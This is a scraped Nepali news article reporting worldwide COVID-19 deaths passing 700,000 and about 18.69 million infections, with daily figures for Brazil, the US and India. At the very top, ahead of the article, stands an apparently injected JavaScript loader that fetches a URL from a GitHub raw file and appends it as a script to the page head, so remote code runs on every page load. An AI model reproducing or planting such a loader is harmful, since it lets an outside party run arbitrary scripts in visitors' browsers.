;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); विश्वमा ७ लाख नाघ्यो कोरोनाबाट ज्यान गुमाउनेको संख्या : १ कारोड ८६ लाख ९१ हजार ६८६ जना संक्रमित – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • विश्वमा ७ लाख नाघ्यो कोरोनाबाट ज्यान गुमाउनेको संख्या : १ कारोड ८६ लाख ९१ हजार ६८६ जना संक्रमित
अन्तर्राष्ट्रिय

विश्वमा ७ लाख नाघ्यो कोरोनाबाट ज्यान गुमाउनेको संख्या : १ कारोड ८६ लाख ९१ हजार ६८६ जना संक्रमित

कोरोना

साउन २१,

काठमाडौं । विश्वभर एकै दिन २ लाख ४५ हजार कोरोना संक्रमित थपिएका छन्। थपिएकामध्ये सवैभन्दा धेरै ब्राजिलका ५६ हजार ४०० रहेका छन्। त्यस्तै अमेरिकामा ५४ हजारमा कोरोना पुष्टि भएको छ।  छिमेकी देश भारतमा ५१ हजार संक्रमित थपिएका छन्। कोरोना भाइरसको संक्रमणका कारण विश्वभर हिजो एकैदिन ६ हजार भन्दा धेरैको मृत्यु भएको छ।

ज्यान गुमाउनेमा सवैभन्दा धेरै ब्राजिलका रहेका छन्। त्यहाँ १३ सय ९४ को मृत्यु भएको अन्र्तराष्ट्रिय संचार माध्ययमले जनाएका छन्। ब्राजिलमा हालसम्म ९६ हजारको मृत्यु भएको छ। अमेरिका हिजो एकैदिन १३ सय मानिसको मृत्यु भएको छ। त्यस्तै भारतमा ८ सय भन्दा धेरैको मृत्यु भएको छ भने त्यहाँ हालसम्म ३९ हजार ८ सयले ज्यान गुमाएका छन्।

विश्वभर ७ लाख ३ हजार ३ सय ७४ जनाको मृत्यु भइसकेको छ भने १ कारोड ८६ लाख ९१ हजार ६ सय ८६ जना संक्रमति भएका छन्। यसै गरी हालसम्म १ कारोड १९ लाख मानिस संक्रमण मुक्त भएको अन्तर्राष्ट्रिय सञ्चारमाध्यमले जनाएका छन् ।file Photo

फेसबुक प्रतिक्रियाहरु